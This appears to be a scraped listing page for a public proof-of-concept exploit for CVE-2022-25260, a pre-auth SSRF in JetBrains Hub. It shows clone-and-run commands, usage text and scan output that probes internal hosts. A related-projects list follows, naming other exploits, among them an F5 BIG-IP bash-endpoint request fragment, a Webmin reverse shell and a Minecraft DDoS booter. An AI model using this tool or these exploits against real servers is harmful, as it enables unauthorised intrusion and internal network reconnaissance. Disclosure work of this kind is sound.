CVE-2022-25260 JetBrains Hub pre-auth semi-blind server-side request forgery (SSRF)

Overview

CVE-2022-25260

JetBrains Hub pre-auth semi-blind server-side request forgery (SSRF)

Requirements

  • JetBrains Hub <2021.1.14276
  • JetBrains Hub before 2021.1.14276 was vulneable to improper access control (CVE-2022-34894), which allows an attacker create untrusted services without authentication even if guest user is disabled. This makes it possible to exploit the vulnerablity without any other requirements (normally an attacker should be at least authenticated)

Usage

Install & run:

$ git clone https://github.com/yuriisanin/CVE-2022-25260
$ cd CVE-2022-25260/
$ python3 exploit.py -h

|--------------------------------------------------------------------|
|       CVE-2022-25260 JetBrains Hub pre-auth semi-blind SSRF        |
|           developed by Yurii Sanin (Twitter: @SaninYurii)          |
|--------------------------------------------------------------------|
usage: exploit.py [-h] -hub_url HUB_URL -email EMAIL [-internal_urls_file INTERNAL_URLS_FILE] [-internal_url INTERNAL_URL]

optional arguments:
  -h, --help            show this help message and exit
  -hub_url HUB_URL      Target Hub instance
  -email EMAIL          Email address of any user in the system
  -internal_urls_file INTERNAL_URLS_FILE
                        Path to internal service URLs file
  -internal_url INTERNAL_URL
                        Internal service URL
  

Usage:

$ python3 exploit.py hub_url http://localhost:8080 -email hello@0d.tf -internal_urls_file ./assets/payloads/urls.txt

|--------------------------------------------------------------------|
|       CVE-2022-25260 JetBrains Hub pre-auth semi-blind SSRF        |
|           developed by Yurii Sanin (Twitter: @SaninYurii)          |
|--------------------------------------------------------------------|
[INFO] - staring scanning for 14 urls.
[INFO] - trying to create Hub service.
[INFO] - Hub service create, serviceId: '02cc6043-1469-4a8e-9a74-b003e721620c'.
[INFO] - trying to request: 'http://127.0.0.1:8080'.
[INFO] - OK. Host 'http://127.0.0.1:8080' is running HTTP service (XML-like response) [FOUND]. Message: 'Attribute name "ng-strict-di" associated with an element type "html" must be followed by the ' = ' character.'.
[INFO] - trying to request: 'http://127.0.0.1:8081'.
[INFO] - OK. Host 'http://127.0.0.1:8081' is DOWN.
[INFO] - trying to request: 'http://google.com'.
[INFO] - OK. Host 'http://google.com' is running HTTP service (presumably XML-like response) [FOUND]. Message: 'The markup in the document preceding the root element must be well-formed.'.

DEMO:

CVE-2022-24342 Demo

How does it work?

The vulnerability was possible due to use of Apache Batik with default settings for user-supplied SVG icon rasterization. You can find more information about exploting server-side SVG rasterization HERE.

Support

You can follow me on Twitter, GitHub or YouTube.

You might also like...

ProxyNotShell and CVE-2022-41040 and CVE-2022-41082 #RCE #Exploit

ProxyNotShell and CVE-2022-41040 and CVE-2022-41082 #RCE #Exploit

ProxyNotShell ProxyNotShell and CVE-2022-41040 and CVE-2022-41082 Microsoft confirmed the two new zero-day vulnerabilities are being used in attacks a

Oct 9, 2022

Contribute here for Hacktoberfest2022. You can submit algorithm codes in different languages. Fell free to submit your Pull Request. Also you can submit your frontend projects. Also feel free to raise issues Solve it and Submit your PULL REQUEST

Contribute here for Hacktoberfest2022. You can submit algorithm codes in different languages. Fell free to submit your Pull Request. Also you can submit your frontend projects. Also feel free to raise issues Solve it and Submit your PULL REQUEST

Beginner_Hactoberfest2022 tags: Hacktoberfest2022 Happy Hacking💻!!! Happy Hacktober! This is a beginner friendly repository made specifically for Hac

Nov 17, 2022

Official repository for "Image splicing forgery detection by combining synthetic adversarial networks and hybrid dense U‐net based on multiple spaces"

SAN_and_HDU-Net Official repository for "Image splicing forgery detection by combining synthetic adversarial networks and hybrid dense U‐net based on

Oct 31, 2022

CVE-2022-22965 - CVE-2010-1622 redux

CVE-2022-22965 - vulnerable app and PoC Trial & error $ docker rm -f rce; docker build -t rce:latest . && docker run -d -p 8080:8080 --name rce rce:la

Aug 25, 2022

BLURtooth: Exploiting Cross-Transport Key Derivation in Bluetooth Classic and Bluetooth Low Energy [CVE-2020-15802] [CVE-2022-20361]

README Repository about the BLUR attacks presented at AsiaCCS'22 in the paper titled: BLURtooth: Exploiting Cross-Transport Key Derivation in Bluetoot

Sep 23, 2022

This is a beginner level repository for python enthusiast to contribute in a hacktoberfest 2022, The aim is to make this repository a pool of script or program written in python. Make your first Pull Request on Hacktoberfest 2022. ⭐

This  is a beginner level repository for python enthusiast to contribute in a hacktoberfest 2022, The aim is to make this repository a pool of script or program written in python. Make your first Pull Request on Hacktoberfest 2022. ⭐

Python Scripts 04th October 2022 - This repository is excluded from Hacktoberfest Upload Scripts or Different Types of Programs in any Python Use this

Nov 3, 2022

Stream results of multi statement PostgreSQL queries from Python without a server-side cursor

streampq Stream results of multi-statement PostgreSQL queries from Python without server-side cursors. Has benefits over some other Python PostgreSQL

Oct 31, 2022

A full stack monolith python web framework; renders svelte in client/server side

FyMo A full stack monolith python web framework; renders svelte in client/server side We are on the way to develop an monolith web framework for quick

Sep 28, 2022

App with Server Side Template Injection (SSTI) vulnerability - in Flask. For web penetration testing / ethical hacking. Possible RCE :)

App with Server Side Template Injection (SSTI) vulnerability - in Flask. For web penetration testing / ethical hacking. Possible RCE :)

Vulnerable Web App: ssti-flask-hacking-playground This is small application vulnerable to Server Side Template Injection (SSTI) in Flask/Jinja2. The v

Nov 21, 2022
Owner
Yurii Sanin
Security Engineer
Yurii Sanin
Exploit for CVE-2022-26134: Confluence Pre-Auth Remote Code Execution via OGNL Injection

Exploit for CVE-2022-26134: Confluence Pre-Auth Remote Code Execution via OGNL Injection Another exploit in OGNL Land Description Confluence is a web-

whokilleddb 4 Jul 29, 2022
CVE-2022-26134 - Pre-Auth Remote Code Execution via OGNL Injection

[-] CVE-2022-26134 - Confluence Pre-Auth Remote Code Execution via OGNL Injection Usage usage: exploit.py [-h] [-f FILE] [-c CMD] [-p LPORT] [-l LHOST

Chocapik 8 Oct 16, 2022
Exploit code for Jira Mobile Rest Plugin SSRF (CVE-2022-26135)

CVE-2022-26135 - Full-Read Server Side Request Forgery in Mobile Plugin for Jira Data Center and Server About Assetnote Assetnote automatically maps y

Assetnote 83 Nov 15, 2022
PoC for CVE-2022-22954 - VMware Workspace ONE Access Freemarker Server-Side Template Injection

CVE-2022-22954 PoC - VMware Workspace ONE Access Freemarker Server-Side Template Injection A vulnerability, which was classified as very critical, was

DrDv 8 Nov 6, 2022
CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE

CVE-2022-1388 CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE. POST /mgmt/tm/util/bash HTTP/1.1 Host: Accept-Encoding: gzip, deflate Accept: */

M4rtin Hsu 79 Nov 9, 2022
Webmin CVE-2022-0824 Post-Auth Reverse Shell

Webmin-CVE-2022-0824-revshell Vulnerability Description Webmin 1.984 and below - File Manager privilege exploit (CVE-2022-0824 and CVE-2022-0829) Less

Faisal Fs 89 Nov 15, 2022
Python Script to exploit Zimbra Auth Bypass + RCE (CVE-2022-27925)

Zimbra Unauthenticated Remote Code Execution Exploit (CVE-2022-27925) _____ _ __ /__ / (_)___ ___ / /_ _________ _ /

Chocapik 8 Nov 9, 2022
Minecraft Server Booter, Minecraft Server Crasher, Minecraft Server NullPing, Minecraft Server DDoS and Minecraft Server Bots

SpuffyCrasher-MinecraftBooter Minecraft Server Booter, Minecraft Server Crasher, Minecraft Server NullPing, Minecraft Server DDoS and Minecraft Server

Tahg 3 Apr 14, 2022
Official code for Leveraging Real Talking Faces via Self-Supervision for Robust Forgery Detection (CVPR 2022)

RealForensics Introduction We provide code for the reproduction of the main results in Leveraging Real Talking Faces via Self-Supervision for Robust F

null 18 Nov 22, 2022
Python script to exploit CVE-2022-22954 and then exploit CVE-2022-22960

CVE-2022-22954 PoC VMware Workspace ONE Access and Identity Manager RCE via SSTI. CVE-2022-22954 - PoC SSTI Usage: CVE-2022-22954.py [-h] -m SET_MODE

Chocapik 26 Oct 25, 2022